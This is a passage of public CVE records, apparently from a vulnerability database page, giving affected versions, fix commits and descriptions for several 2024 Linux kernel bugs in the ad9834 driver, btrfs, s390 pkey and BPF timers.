                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.226",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.110",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.51",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.10",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nstaging: iio: frequency: ad9834: Validate frequency parameter value\n\nIn ad9834_write_frequency() clk_get_rate() can return 0. In such case\nad9834_calc_freqreg() call will lead to division by zero. Checking\n\u0027if (fout \u003e (clk_freq / 2))\u0027 doesn\u0027t protect in case of \u0027fout\u0027 is 0.\nad9834_write_frequency() is called from ad9834_write(), where fout is\ntaken from text buffer, which can contain any value.\n\nModify parameters checking.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:36:40.948Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/5edc3a45ef428501000a7b23d0e1777a548907f6"
        },
        {
          "url": "https://git.kernel.org/stable/c/0e727707a239d5c519fc9abc2f0fd913516a7e47"
        },
        {
          "url": "https://git.kernel.org/stable/c/41cc91e3138fe52f8da92a81bebcd0e6cf488c53"
        },
        {
          "url": "https://git.kernel.org/stable/c/d8b09a5edc4a634373158c1a405491de3c52e58a"
        },
        {
          "url": "https://git.kernel.org/stable/c/3ba9abfcaa9e16bb91ed7e0e2b42e94a157a953e"
        },
        {
          "url": "https://git.kernel.org/stable/c/dc12e49f970b08d8b007b8981b97e2eb93c0e89d"
        },
        {
          "url": "https://git.kernel.org/stable/c/8961b245e8f92bccbaacfbbdf69eba60e3e7c227"
        },
        {
          "url": "https://git.kernel.org/stable/c/b48aa991758999d4e8f9296c5bbe388f293ef465"
        }
      ],
      "title": "staging: iio: frequency: ad9834: Validate frequency parameter value",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-47663",
    "datePublished": "2024-10-09T14:13:56.514Z",
    "dateReserved": "2024-09-30T16:00:12.935Z",
    "dateUpdated": "2025-11-03T22:20:26.126Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-46840 (GCVE-0-2024-46840)

Vulnerability from cvelistv5 – Published: 2024-09-27 12:39 – Updated: 2026-01-05 10:53

Title

btrfs: clean up our handling of refs == 0 in snapshot delete

Summary

In the Linux kernel, the following vulnerability has been resolved: btrfs: clean up our handling of refs == 0 in snapshot delete In reada we BUG_ON(refs == 0), which could be unkind since we aren't holding a lock on the extent leaf and thus could get a transient incorrect answer. In walk_down_proc we also BUG_ON(refs == 0), which could happen if we have extent tree corruption. Change that to return -EUCLEAN. In do_walk_down() we catch this case and handle it correctly, however we return -EIO, which -EUCLEAN is a more appropriate error code. Finally in walk_up_proc we have the same BUG_ON(refs == 0), so convert that to proper error handling. Also adjust the error message so we can actually do something with the information.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/c847b28a799733b04…
	https://git.kernel.org/stable/c/71291aa7246645ef6…
	https://git.kernel.org/stable/c/c60676b81fab456b6…
	https://git.kernel.org/stable/c/728d4d045b628e006…
	https://git.kernel.org/stable/c/9cc887ac24b7a0598…
	https://git.kernel.org/stable/c/7d1df13bf078ffebf…
	https://git.kernel.org/stable/c/03804641ec2d0da4f…
	https://git.kernel.org/stable/c/b8ccef048354074a5…

Impacted products

Vendor

Product

Version

Linux

Affected: 2c47e605a91dde6b0514f689645e7ab336c8592a , < c847b28a799733b04574060ab9d00f215970627d (git)
Affected: 2c47e605a91dde6b0514f689645e7ab336c8592a , < 71291aa7246645ef622621934d2067400380645e (git)
Affected: 2c47e605a91dde6b0514f689645e7ab336c8592a , < c60676b81fab456b672796830f6d8057058f029c (git)
Affected: 2c47e605a91dde6b0514f689645e7ab336c8592a , < 728d4d045b628e006b48a448f3326a7194c88d32 (git)
Affected: 2c47e605a91dde6b0514f689645e7ab336c8592a , < 9cc887ac24b7a0598f4042ae9af6b9a33072f75b (git)
Affected: 2c47e605a91dde6b0514f689645e7ab336c8592a , < 7d1df13bf078ffebfedd361d714ff6cee1ff01b9 (git)
Affected: 2c47e605a91dde6b0514f689645e7ab336c8592a , < 03804641ec2d0da4fa088ad21c88e703d151ce16 (git)
Affected: 2c47e605a91dde6b0514f689645e7ab336c8592a , < b8ccef048354074a548f108e51d0557d6adfd3a3 (git)

Linux

Affected: 2.6.31
Unaffected: 0 , < 2.6.31 (semver)
Unaffected: 4.19.322 , ≤ 4.19.* (semver)
Unaffected: 5.4.284 , ≤ 5.4.* (semver)
Unaffected: 5.10.226 , ≤ 5.10.* (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.110 , ≤ 6.1.* (semver)
Unaffected: 6.6.51 , ≤ 6.6.* (semver)
Unaffected: 6.10.10 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-46840",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T13:59:36.735049Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-29T13:59:41.445Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:19:28.536Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/btrfs/extent-tree.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "c847b28a799733b04574060ab9d00f215970627d",
              "status": "affected",
              "version": "2c47e605a91dde6b0514f689645e7ab336c8592a",
              "versionType": "git"
            },
            {
              "lessThan": "71291aa7246645ef622621934d2067400380645e",
              "status": "affected",
              "version": "2c47e605a91dde6b0514f689645e7ab336c8592a",
              "versionType": "git"
            },
            {
              "lessThan": "c60676b81fab456b672796830f6d8057058f029c",
              "status": "affected",
              "version": "2c47e605a91dde6b0514f689645e7ab336c8592a",
              "versionType": "git"
            },
            {
              "lessThan": "728d4d045b628e006b48a448f3326a7194c88d32",
              "status": "affected",
              "version": "2c47e605a91dde6b0514f689645e7ab336c8592a",
              "versionType": "git"
            },
            {
              "lessThan": "9cc887ac24b7a0598f4042ae9af6b9a33072f75b",
              "status": "affected",
              "version": "2c47e605a91dde6b0514f689645e7ab336c8592a",
              "versionType": "git"
            },
            {
              "lessThan": "7d1df13bf078ffebfedd361d714ff6cee1ff01b9",
              "status": "affected",
              "version": "2c47e605a91dde6b0514f689645e7ab336c8592a",
              "versionType": "git"
            },
            {
              "lessThan": "03804641ec2d0da4fa088ad21c88e703d151ce16",
              "status": "affected",
              "version": "2c47e605a91dde6b0514f689645e7ab336c8592a",
              "versionType": "git"
            },
            {
              "lessThan": "b8ccef048354074a548f108e51d0557d6adfd3a3",
              "status": "affected",
              "version": "2c47e605a91dde6b0514f689645e7ab336c8592a",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/btrfs/extent-tree.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.31"
            },
            {
              "lessThan": "2.6.31",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.322",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.284",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.226",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.110",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.51",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.322",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.284",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.226",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.110",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.51",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.10",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: clean up our handling of refs == 0 in snapshot delete\n\nIn reada we BUG_ON(refs == 0), which could be unkind since we aren\u0027t\nholding a lock on the extent leaf and thus could get a transient\nincorrect answer.  In walk_down_proc we also BUG_ON(refs == 0), which\ncould happen if we have extent tree corruption.  Change that to return\n-EUCLEAN.  In do_walk_down() we catch this case and handle it correctly,\nhowever we return -EIO, which -EUCLEAN is a more appropriate error code.\nFinally in walk_up_proc we have the same BUG_ON(refs == 0), so convert\nthat to proper error handling.  Also adjust the error message so we can\nactually do something with the information."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:53:35.228Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/c847b28a799733b04574060ab9d00f215970627d"
        },
        {
          "url": "https://git.kernel.org/stable/c/71291aa7246645ef622621934d2067400380645e"
        },
        {
          "url": "https://git.kernel.org/stable/c/c60676b81fab456b672796830f6d8057058f029c"
        },
        {
          "url": "https://git.kernel.org/stable/c/728d4d045b628e006b48a448f3326a7194c88d32"
        },
        {
          "url": "https://git.kernel.org/stable/c/9cc887ac24b7a0598f4042ae9af6b9a33072f75b"
        },
        {
          "url": "https://git.kernel.org/stable/c/7d1df13bf078ffebfedd361d714ff6cee1ff01b9"
        },
        {
          "url": "https://git.kernel.org/stable/c/03804641ec2d0da4fa088ad21c88e703d151ce16"
        },
        {
          "url": "https://git.kernel.org/stable/c/b8ccef048354074a548f108e51d0557d6adfd3a3"
        }
      ],
      "title": "btrfs: clean up our handling of refs == 0 in snapshot delete",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-46840",
    "datePublished": "2024-09-27T12:39:34.998Z",
    "dateReserved": "2024-09-11T15:12:18.288Z",
    "dateUpdated": "2026-01-05T10:53:35.228Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42156 (GCVE-0-2024-42156)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:46 – Updated: 2025-05-20 14:27

Title

s390/pkey: Wipe copies of clear-key structures on failure

Summary

In the Linux kernel, the following vulnerability has been resolved: s390/pkey: Wipe copies of clear-key structures on failure Wipe all sensitive data from stack for all IOCTLs, which convert a clear-key into a protected- or secure-key.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/a891938947f4427f9…
	https://git.kernel.org/stable/c/7f6243edd901b75aa…
	https://git.kernel.org/stable/c/d65d76a44ffe74c73…

Impacted products

Vendor

Product

Version

Linux

Affected: f2bbc96e7cfad3891b7bf9bd3e566b9b7ab4553d , < a891938947f4427f98cb1ce54f27223501efe750 (git)
Affected: f2bbc96e7cfad3891b7bf9bd3e566b9b7ab4553d , < 7f6243edd901b75aaece326c90a1cc0dcb60cc3d (git)
Affected: f2bbc96e7cfad3891b7bf9bd3e566b9b7ab4553d , < d65d76a44ffe74c73298ada25b0f578680576073 (git)

Linux

Affected: 5.4
Unaffected: 0 , < 5.4 (semver)
Unaffected: 6.6.64 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:54:32.172Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7f6243edd901b75aaece326c90a1cc0dcb60cc3d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d65d76a44ffe74c73298ada25b0f578680576073"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42156",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:15:08.677401Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:34.120Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/s390/crypto/pkey_api.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "a891938947f4427f98cb1ce54f27223501efe750",
              "status": "affected",
              "version": "f2bbc96e7cfad3891b7bf9bd3e566b9b7ab4553d",
              "versionType": "git"
            },
            {
              "lessThan": "7f6243edd901b75aaece326c90a1cc0dcb60cc3d",
              "status": "affected",
              "version": "f2bbc96e7cfad3891b7bf9bd3e566b9b7ab4553d",
              "versionType": "git"
            },
            {
              "lessThan": "d65d76a44ffe74c73298ada25b0f578680576073",
              "status": "affected",
              "version": "f2bbc96e7cfad3891b7bf9bd3e566b9b7ab4553d",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/s390/crypto/pkey_api.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.4"
            },
            {
              "lessThan": "5.4",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.64",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.64",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/pkey: Wipe copies of clear-key structures on failure\n\nWipe all sensitive data from stack for all IOCTLs, which convert a\nclear-key into a protected- or secure-key."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-20T14:27:36.396Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/a891938947f4427f98cb1ce54f27223501efe750"
        },
        {
          "url": "https://git.kernel.org/stable/c/7f6243edd901b75aaece326c90a1cc0dcb60cc3d"
        },
        {
          "url": "https://git.kernel.org/stable/c/d65d76a44ffe74c73298ada25b0f578680576073"
        }
      ],
      "title": "s390/pkey: Wipe copies of clear-key structures on failure",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42156",
    "datePublished": "2024-07-30T07:46:58.513Z",
    "dateReserved": "2024-07-29T15:50:41.194Z",
    "dateUpdated": "2025-05-20T14:27:36.396Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42239 (GCVE-0-2024-42239)

Vulnerability from cvelistv5 – Published: 2024-08-07 15:14 – Updated: 2025-05-04 09:24

Title

bpf: Fail bpf_timer_cancel when callback is being cancelled

Summary

In the Linux kernel, the following vulnerability has been resolved: bpf: Fail bpf_timer_cancel when callback is being cancelled Given a schedule: timer1 cb timer2 cb bpf_timer_cancel(timer2); bpf_timer_cancel(timer1); Both bpf_timer_cancel calls would wait for the other callback to finish executing, introducing a lockup. Add an atomic_t count named 'cancelling' in bpf_hrtimer. This keeps track of all in-flight cancellation requests for a given BPF timer. Whenever cancelling a BPF timer, we must check if we have outstanding cancellation requests, and if so, we must fail the operation with an error (-EDEADLK) since cancellation is synchronous and waits for the callback to finish executing. This implies that we can enter a deadlock situation involving two or more timer callbacks executing in parallel and attempting to cancel one another. Note that we avoid incrementing the cancelling counter for the target timer (the one being cancelled) if bpf_timer_cancel is not invoked from a callback, to avoid spurious errors. The whole point of detecting cur->cancelling and returning -EDEADLK is to not enter a busy wait loop (which may or may not lead to a lockup). This does not apply in case the caller is in a non-callback context, the other side can continue to cancel as it sees fit without running into errors. Background on prior attempts: Earlier versions of this patch used a bool 'cancelling' bit and used the following pattern under timer->lock to publish cancellation status. lock(t->lock); t->cancelling = true; mb(); if (cur->cancelling) return -EDEADLK; unlock(t->lock); hrtimer_cancel(t->timer); t->cancelling = false; The store outside the critical section could overwrite a parallel requests t->cancelling assignment to true, to ensure the parallely executing callback observes its cancellation status. It would be necessary to clear this cancelling bit once hrtimer_cancel is done, but lack of serialization introduced races. Another option was explored where bpf_timer_start would clear the bit when (re)starting the timer under timer->lock. This would ensure serialized access to the cancelling bit, but may allow it to be cleared before in-flight hrtimer_cancel has finished executing, such that lockups can occur again. Thus, we choose an atomic counter to keep track of all outstanding cancellation requests and use it to prevent lockups in case callbacks attempt to cancel each other while executing in parallel.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/9369830518688ecd5…
	https://git.kernel.org/stable/c/3e4e8178a8666c568…
	https://git.kernel.org/stable/c/d4523831f07a267a9…

Impacted products

Vendor

Product

Version

Linux

Affected: b00628b1c7d595ae5b544e059c27b1f5828314b4 , < 9369830518688ecd5b08ffc08ab3302ce2b5d0f7 (git)
Affected: b00628b1c7d595ae5b544e059c27b1f5828314b4 , < 3e4e8178a8666c56813bd167b848fca0f4c9af0a (git)
Affected: b00628b1c7d595ae5b544e059c27b1f5828314b4 , < d4523831f07a267a943f0dde844bf8ead7495f13 (git)

Linux

Affected: 5.15
Unaffected: 0 , < 5.15 (semver)
Unaffected: 6.6.41 , ≤ 6.6.* (semver)
Unaffected: 6.9.10 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42239",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:13:54.505425Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:31.803Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "kernel/bpf/helpers.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "9369830518688ecd5b08ffc08ab3302ce2b5d0f7",
              "status": "affected",
              "version": "b00628b1c7d595ae5b544e059c27b1f5828314b4",
              "versionType": "git"
            },
            {
              "lessThan": "3e4e8178a8666c56813bd167b848fca0f4c9af0a",
              "status": "affected",
              "version": "b00628b1c7d595ae5b544e059c27b1f5828314b4",
              "versionType": "git"
            },
            {
              "lessThan": "d4523831f07a267a943f0dde844bf8ead7495f13",
              "status": "affected",
              "version": "b00628b1c7d595ae5b544e059c27b1f5828314b4",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "kernel/bpf/helpers.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.15"
            },
            {
              "lessThan": "5.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.41",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.41",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.10",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fail bpf_timer_cancel when callback is being cancelled\n\nGiven a schedule:\n\ntimer1 cb\t\t\ttimer2 cb\n\nbpf_timer_cancel(timer2);\tbpf_timer_cancel(timer1);\n\nBoth bpf_timer_cancel calls would wait for the other callback to finish\nexecuting, introducing a lockup.\n\nAdd an atomic_t count named \u0027cancelling\u0027 in bpf_hrtimer. This keeps\ntrack of all in-flight cancellation requests for a given BPF timer.\nWhenever cancelling a BPF timer, we must check if we have outstanding\ncancellation requests, and if so, we must fail the operation with an\nerror (-EDEADLK) since cancellation is synchronous and waits for the\ncallback to finish executing. This implies that we can enter a deadlock\nsituation involving two or more timer callbacks executing in parallel\nand attempting to cancel one another.\n\nNote that we avoid incrementing the cancelling counter for the target\ntimer (the one being cancelled) if bpf_timer_cancel is not invoked from\na callback, to avoid spurious errors. The whole point of detecting\ncur-\u003ecancelling and returning -EDEADLK is to not enter a busy wait loop\n(which may or may not lead to a lockup). This does not apply in case the\ncaller is in a non-callback context, the other side can continue to\ncancel as it sees fit without running into errors.\n\nBackground on prior attempts:\n\nEarlier versions of this patch used a bool \u0027cancelling\u0027 bit and used the\nfollowing pattern under timer-\u003elock to publish cancellation status.\n\nlock(t-\u003elock);\nt-\u003ecancelling = true;\nmb();\nif (cur-\u003ecancelling)\n\treturn -EDEADLK;\nunlock(t-\u003elock);\nhrtimer_cancel(t-\u003etimer);\nt-\u003ecancelling = false;\n\nThe store outside the critical section could overwrite a parallel\nrequests t-\u003ecancelling assignment to true, to ensure the parallely\nexecuting callback observes its cancellation status.\n\nIt would be necessary to clear this cancelling bit once hrtimer_cancel\nis done, but lack of serialization introduced races. Another option was\nexplored where bpf_timer_start would clear the bit when (re)starting the\ntimer under timer-\u003elock. This would ensure serialized access to the\ncancelling bit, but may allow it to be cleared before in-flight\nhrtimer_cancel has finished executing, such that lockups can occur\nagain.\n\nThus, we choose an atomic counter to keep track of all outstanding\ncancellation requests and use it to prevent lockups in case callbacks\nattempt to cancel each other while executing in parallel."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:24:50.911Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/9369830518688ecd5b08ffc08ab3302ce2b5d0f7"
        },
        {
          "url": "https://git.kernel.org/stable/c/3e4e8178a8666c56813bd167b848fca0f4c9af0a"
        },
        {
          "url": "https://git.kernel.org/stable/c/d4523831f07a267a943f0dde844bf8ead7495f13"
        }
      ],
      "title": "bpf: Fail bpf_timer_cancel when callback is being cancelled",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42239",
    "datePublished": "2024-08-07T15:14:27.382Z",
    "dateReserved": "2024-07-30T07:40:12.253Z",
    "dateUpdated": "2025-05-04T09:24:50.911Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42111 (GCVE-0-2024-42111)

